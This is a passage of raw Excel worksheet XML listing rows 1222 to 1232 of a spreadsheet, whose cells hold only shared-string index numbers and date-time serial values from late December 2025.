      <c r="M1222" s="24">
        <v>46020.648587963</v>
      </c>
      <c r="N1222" s="23" t="s">
        <v>9116</v>
      </c>
      <c r="O1222" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1222" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1222" s="23"/>
      <c r="R1222" s="23" t="s">
        <v>10605</v>
      </c>
      <c r="S1222" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1222" s="23"/>
      <c r="U1222" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1222" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1222" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1222" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1222" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1222" s="24">
        <v>46020.6492361111</v>
      </c>
      <c r="AA1222" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1222" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1222" s="23"/>
      <c r="AD1222" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1222" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1222" s="23"/>
      <c r="AG1222" s="25" t="s">
        <v>8409</v>
      </c>
      <c r="AH1222" s="24">
        <v>46020.6492592593</v>
      </c>
      <c r="AI1222" s="23"/>
      <c r="AJ1222" s="23"/>
      <c r="AK1222" s="23"/>
      <c r="AL1222" s="23"/>
      <c r="AM1222" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1222" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1222" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1222" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1222" s="24">
        <v>46020.6700694444</v>
      </c>
      <c r="AR1222" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1222" s="23"/>
      <c r="AT1222" s="23"/>
      <c r="AU1222" s="23"/>
    </row>
    <row r="1223" s="1" customFormat="1" spans="1:47">
      <c r="A1223" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1223" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1223" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1223" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1223" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1223" s="23" t="s">
        <v>10606</v>
      </c>
      <c r="G1223" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1223" s="23"/>
      <c r="I1223" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1223" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1223" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1223" s="24">
        <v>46020.5824189815</v>
      </c>
      <c r="M1223" s="24">
        <v>46020.5824189815</v>
      </c>
      <c r="N1223" s="23" t="s">
        <v>8809</v>
      </c>
      <c r="O1223" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1223" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1223" s="23"/>
      <c r="R1223" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S1223" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1223" s="23"/>
      <c r="U1223" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1223" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1223" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1223" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1223" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1223" s="24">
        <v>46020.5832407407</v>
      </c>
      <c r="AA1223" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1223" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1223" s="23"/>
      <c r="AD1223" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1223" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1223" s="23"/>
      <c r="AG1223" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1223" s="24">
        <v>46020.5832638889</v>
      </c>
      <c r="AI1223" s="23"/>
      <c r="AJ1223" s="23"/>
      <c r="AK1223" s="23"/>
      <c r="AL1223" s="23"/>
      <c r="AM1223" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1223" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1223" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1223" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1223" s="24">
        <v>46020.6040740741</v>
      </c>
      <c r="AR1223" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1223" s="23"/>
      <c r="AT1223" s="23"/>
      <c r="AU1223" s="23"/>
    </row>
    <row r="1224" s="1" customFormat="1" spans="1:47">
      <c r="A1224" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1224" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1224" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1224" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1224" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1224" s="23" t="s">
        <v>10607</v>
      </c>
      <c r="G1224" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1224" s="23"/>
      <c r="I1224" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1224" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1224" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1224" s="24">
        <v>46020.5555671296</v>
      </c>
      <c r="M1224" s="24">
        <v>46020.5555671296</v>
      </c>
      <c r="N1224" s="23" t="s">
        <v>8809</v>
      </c>
      <c r="O1224" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1224" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1224" s="23"/>
      <c r="R1224" s="23" t="s">
        <v>2484</v>
      </c>
      <c r="S1224" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1224" s="23"/>
      <c r="U1224" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1224" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1224" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1224" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1224" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1224" s="24">
        <v>46020.556087963</v>
      </c>
      <c r="AA1224" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1224" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1224" s="23"/>
      <c r="AD1224" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1224" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1224" s="23"/>
      <c r="AG1224" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1224" s="24">
        <v>46020.5561111111</v>
      </c>
      <c r="AI1224" s="23"/>
      <c r="AJ1224" s="23"/>
      <c r="AK1224" s="23"/>
      <c r="AL1224" s="23"/>
      <c r="AM1224" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1224" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1224" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1224" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1224" s="24">
        <v>46020.5769212963</v>
      </c>
      <c r="AR1224" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1224" s="23"/>
      <c r="AT1224" s="23"/>
      <c r="AU1224" s="23"/>
    </row>
    <row r="1225" s="1" customFormat="1" spans="1:47">
      <c r="A1225" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1225" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1225" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1225" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1225" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1225" s="23" t="s">
        <v>10608</v>
      </c>
      <c r="G1225" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1225" s="23"/>
      <c r="I1225" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1225" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1225" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1225" s="24">
        <v>46020.3669791667</v>
      </c>
      <c r="M1225" s="24">
        <v>46020.3669791667</v>
      </c>
      <c r="N1225" s="23" t="s">
        <v>8586</v>
      </c>
      <c r="O1225" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1225" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1225" s="23"/>
      <c r="R1225" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S1225" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1225" s="23"/>
      <c r="U1225" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1225" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1225" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1225" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1225" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1225" s="24">
        <v>46020.367974537</v>
      </c>
      <c r="AA1225" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1225" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1225" s="23"/>
      <c r="AD1225" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1225" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1225" s="23"/>
      <c r="AG1225" s="25" t="s">
        <v>8409</v>
      </c>
      <c r="AH1225" s="24">
        <v>46020.3680092593</v>
      </c>
      <c r="AI1225" s="23"/>
      <c r="AJ1225" s="23"/>
      <c r="AK1225" s="23"/>
      <c r="AL1225" s="23"/>
      <c r="AM1225" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1225" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1225" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1225" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1225" s="24">
        <v>46020.3888078704</v>
      </c>
      <c r="AR1225" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1225" s="23"/>
      <c r="AT1225" s="23"/>
      <c r="AU1225" s="23"/>
    </row>
    <row r="1226" s="1" customFormat="1" spans="1:47">
      <c r="A1226" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1226" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1226" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1226" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1226" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1226" s="23" t="s">
        <v>10609</v>
      </c>
      <c r="G1226" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1226" s="23"/>
      <c r="I1226" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1226" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1226" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1226" s="24">
        <v>46020.3630902778</v>
      </c>
      <c r="M1226" s="24">
        <v>46020.3630902778</v>
      </c>
      <c r="N1226" s="23" t="s">
        <v>8586</v>
      </c>
      <c r="O1226" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1226" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1226" s="23"/>
      <c r="R1226" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S1226" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1226" s="23"/>
      <c r="U1226" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1226" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1226" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1226" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1226" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1226" s="24">
        <v>46020.363912037</v>
      </c>
      <c r="AA1226" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1226" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1226" s="23"/>
      <c r="AD1226" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1226" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1226" s="23"/>
      <c r="AG1226" s="25" t="s">
        <v>8409</v>
      </c>
      <c r="AH1226" s="24">
        <v>46020.3639351852</v>
      </c>
      <c r="AI1226" s="23"/>
      <c r="AJ1226" s="23"/>
      <c r="AK1226" s="23"/>
      <c r="AL1226" s="23"/>
      <c r="AM1226" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1226" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1226" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1226" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1226" s="24">
        <v>46020.3847453704</v>
      </c>
      <c r="AR1226" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1226" s="23"/>
      <c r="AT1226" s="23"/>
      <c r="AU1226" s="23"/>
    </row>
    <row r="1227" s="1" customFormat="1" spans="1:47">
      <c r="A1227" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1227" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1227" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1227" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1227" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1227" s="23" t="s">
        <v>10610</v>
      </c>
      <c r="G1227" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1227" s="23"/>
      <c r="I1227" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1227" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1227" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1227" s="24">
        <v>46020.3592939815</v>
      </c>
      <c r="M1227" s="24">
        <v>46020.3592939815</v>
      </c>
      <c r="N1227" s="23" t="s">
        <v>8586</v>
      </c>
      <c r="O1227" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1227" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1227" s="23"/>
      <c r="R1227" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S1227" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1227" s="23"/>
      <c r="U1227" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1227" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1227" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1227" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1227" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1227" s="24">
        <v>46020.3602083333</v>
      </c>
      <c r="AA1227" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1227" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1227" s="23"/>
      <c r="AD1227" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1227" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1227" s="23"/>
      <c r="AG1227" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1227" s="24">
        <v>46020.3602314815</v>
      </c>
      <c r="AI1227" s="23"/>
      <c r="AJ1227" s="23"/>
      <c r="AK1227" s="23"/>
      <c r="AL1227" s="23"/>
      <c r="AM1227" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1227" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1227" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1227" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1227" s="24">
        <v>46020.3810416667</v>
      </c>
      <c r="AR1227" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1227" s="23"/>
      <c r="AT1227" s="23"/>
      <c r="AU1227" s="23"/>
    </row>
    <row r="1228" s="1" customFormat="1" spans="1:47">
      <c r="A1228" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1228" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1228" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1228" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1228" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1228" s="23" t="s">
        <v>10611</v>
      </c>
      <c r="G1228" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1228" s="23"/>
      <c r="I1228" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1228" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1228" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1228" s="24">
        <v>46019.7805902778</v>
      </c>
      <c r="M1228" s="24">
        <v>46019.7805902778</v>
      </c>
      <c r="N1228" s="23" t="s">
        <v>8385</v>
      </c>
      <c r="O1228" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1228" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1228" s="23"/>
      <c r="R1228" s="23" t="s">
        <v>1018</v>
      </c>
      <c r="S1228" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1228" s="23"/>
      <c r="U1228" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1228" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1228" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1228" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1228" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1228" s="24">
        <v>46019.7815046296</v>
      </c>
      <c r="AA1228" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1228" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1228" s="23"/>
      <c r="AD1228" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1228" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1228" s="23"/>
      <c r="AG1228" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1228" s="24">
        <v>46019.7815393519</v>
      </c>
      <c r="AI1228" s="23"/>
      <c r="AJ1228" s="23"/>
      <c r="AK1228" s="23"/>
      <c r="AL1228" s="23"/>
      <c r="AM1228" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1228" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1228" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1228" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1228" s="24">
        <v>46019.802337963</v>
      </c>
      <c r="AR1228" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1228" s="23"/>
      <c r="AT1228" s="23"/>
      <c r="AU1228" s="23"/>
    </row>
    <row r="1229" s="1" customFormat="1" spans="1:47">
      <c r="A1229" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1229" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1229" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1229" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1229" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1229" s="23" t="s">
        <v>10612</v>
      </c>
      <c r="G1229" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1229" s="23"/>
      <c r="I1229" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1229" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1229" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1229" s="24">
        <v>46019.6507638889</v>
      </c>
      <c r="M1229" s="24">
        <v>46019.6507638889</v>
      </c>
      <c r="N1229" s="23" t="s">
        <v>8385</v>
      </c>
      <c r="O1229" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1229" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1229" s="23"/>
      <c r="R1229" s="23" t="s">
        <v>2484</v>
      </c>
      <c r="S1229" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1229" s="23"/>
      <c r="U1229" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1229" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1229" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1229" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1229" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1229" s="24">
        <v>46019.6515509259</v>
      </c>
      <c r="AA1229" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1229" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1229" s="23"/>
      <c r="AD1229" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1229" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1229" s="23"/>
      <c r="AG1229" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1229" s="24">
        <v>46019.6515740741</v>
      </c>
      <c r="AI1229" s="23"/>
      <c r="AJ1229" s="23"/>
      <c r="AK1229" s="23"/>
      <c r="AL1229" s="23"/>
      <c r="AM1229" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1229" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1229" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1229" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1229" s="24">
        <v>46019.6723842593</v>
      </c>
      <c r="AR1229" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1229" s="23"/>
      <c r="AT1229" s="23"/>
      <c r="AU1229" s="23"/>
    </row>
    <row r="1230" s="1" customFormat="1" spans="1:47">
      <c r="A1230" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1230" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1230" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1230" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1230" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1230" s="23" t="s">
        <v>10613</v>
      </c>
      <c r="G1230" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1230" s="23"/>
      <c r="I1230" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1230" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1230" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1230" s="24">
        <v>46019.4206018519</v>
      </c>
      <c r="M1230" s="24">
        <v>46019.4206018519</v>
      </c>
      <c r="N1230" s="23" t="s">
        <v>8385</v>
      </c>
      <c r="O1230" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1230" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1230" s="23"/>
      <c r="R1230" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S1230" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1230" s="23"/>
      <c r="U1230" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1230" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1230" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1230" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1230" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1230" s="24">
        <v>46019.4214699074</v>
      </c>
      <c r="AA1230" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1230" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1230" s="23"/>
      <c r="AD1230" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1230" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1230" s="23"/>
      <c r="AG1230" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1230" s="24">
        <v>46019.4215046296</v>
      </c>
      <c r="AI1230" s="23"/>
      <c r="AJ1230" s="23"/>
      <c r="AK1230" s="23"/>
      <c r="AL1230" s="23"/>
      <c r="AM1230" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1230" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1230" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1230" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1230" s="24">
        <v>46019.4423032407</v>
      </c>
      <c r="AR1230" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1230" s="23"/>
      <c r="AT1230" s="23"/>
      <c r="AU1230" s="23"/>
    </row>
    <row r="1231" s="1" customFormat="1" spans="1:47">
      <c r="A1231" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1231" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1231" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1231" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1231" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1231" s="23" t="s">
        <v>10614</v>
      </c>
      <c r="G1231" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1231" s="23"/>
      <c r="I1231" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1231" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1231" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1231" s="24">
        <v>46019.3855555556</v>
      </c>
      <c r="M1231" s="24">
        <v>46019.3855555556</v>
      </c>
      <c r="N1231" s="23" t="s">
        <v>8385</v>
      </c>
      <c r="O1231" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1231" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1231" s="23"/>
      <c r="R1231" s="23" t="s">
        <v>2484</v>
      </c>
      <c r="S1231" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1231" s="23"/>
      <c r="U1231" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1231" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1231" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1231" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1231" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1231" s="24">
        <v>46019.3863425926</v>
      </c>
      <c r="AA1231" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1231" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1231" s="23"/>
      <c r="AD1231" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1231" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1231" s="23"/>
      <c r="AG1231" s="25" t="s">
        <v>8409</v>
      </c>
      <c r="AH1231" s="24">
        <v>46019.3863541667</v>
      </c>
      <c r="AI1231" s="23"/>
      <c r="AJ1231" s="23"/>
      <c r="AK1231" s="23"/>
      <c r="AL1231" s="23"/>
      <c r="AM1231" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1231" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1231" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1231" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1231" s="24">
        <v>46019.4071759259</v>
      </c>
      <c r="AR1231" s="23" t="s">
        <v>8413</v>
      </c>
      <c r="AS1231" s="23"/>
      <c r="AT1231" s="23"/>
      <c r="AU1231" s="23"/>
    </row>
    <row r="1232" s="1" customFormat="1" spans="1:47">
      <c r="A1232" s="23" t="s">
        <v>8414</v>
      </c>
      <c r="B1232" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="C1232" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="D1232" s="23" t="s">
        <v>8415</v>
      </c>
      <c r="E1232" s="23" t="s">
        <v>8546</v>
      </c>
      <c r="F1232" s="23" t="s">
        <v>10615</v>
      </c>
      <c r="G1232" s="23" t="s">
        <v>8381</v>
      </c>
      <c r="H1232" s="23"/>
      <c r="I1232" s="23" t="s">
        <v>8382</v>
      </c>
      <c r="J1232" s="23" t="s">
        <v>8403</v>
      </c>
      <c r="K1232" s="23" t="s">
        <v>8417</v>
      </c>
      <c r="L1232" s="24">
        <v>46018.5813541667</v>
      </c>
      <c r="M1232" s="24">
        <v>46018.5813541667</v>
      </c>
      <c r="N1232" s="23" t="s">
        <v>8809</v>
      </c>
      <c r="O1232" s="23" t="s">
        <v>10531</v>
      </c>
      <c r="P1232" s="23" t="s">
        <v>8377</v>
      </c>
      <c r="Q1232" s="23"/>
      <c r="R1232" s="23" t="s">
        <v>824</v>
      </c>
      <c r="S1232" s="23" t="s">
        <v>3612</v>
      </c>
      <c r="T1232" s="23"/>
      <c r="U1232" s="23" t="s">
        <v>8419</v>
      </c>
      <c r="V1232" s="23" t="s">
        <v>8388</v>
      </c>
      <c r="W1232" s="23" t="s">
        <v>121</v>
      </c>
      <c r="X1232" s="23" t="s">
        <v>8389</v>
      </c>
      <c r="Y1232" s="23" t="s">
        <v>8390</v>
      </c>
      <c r="Z1232" s="24">
        <v>46018.5821180556</v>
      </c>
      <c r="AA1232" s="23" t="s">
        <v>8541</v>
      </c>
      <c r="AB1232" s="23" t="s">
        <v>8391</v>
      </c>
      <c r="AC1232" s="23"/>
      <c r="AD1232" s="23" t="s">
        <v>8408</v>
      </c>
      <c r="AE1232" s="23" t="s">
        <v>8393</v>
      </c>
      <c r="AF1232" s="23"/>
      <c r="AG1232" s="25" t="s">
        <v>8394</v>
      </c>
      <c r="AH1232" s="24">
        <v>46018.5821412037</v>
      </c>
      <c r="AI1232" s="23"/>
      <c r="AJ1232" s="23"/>
      <c r="AK1232" s="23"/>
      <c r="AL1232" s="23"/>
      <c r="AM1232" s="23" t="s">
        <v>8395</v>
      </c>
      <c r="AN1232" s="23" t="s">
        <v>8420</v>
      </c>
      <c r="AO1232" s="23" t="s">
        <v>8396</v>
      </c>
      <c r="AP1232" s="23" t="s">
        <v>8397</v>
      </c>
      <c r="AQ1232" s="24">
        <v>46018.6029513889</v>
      </c>
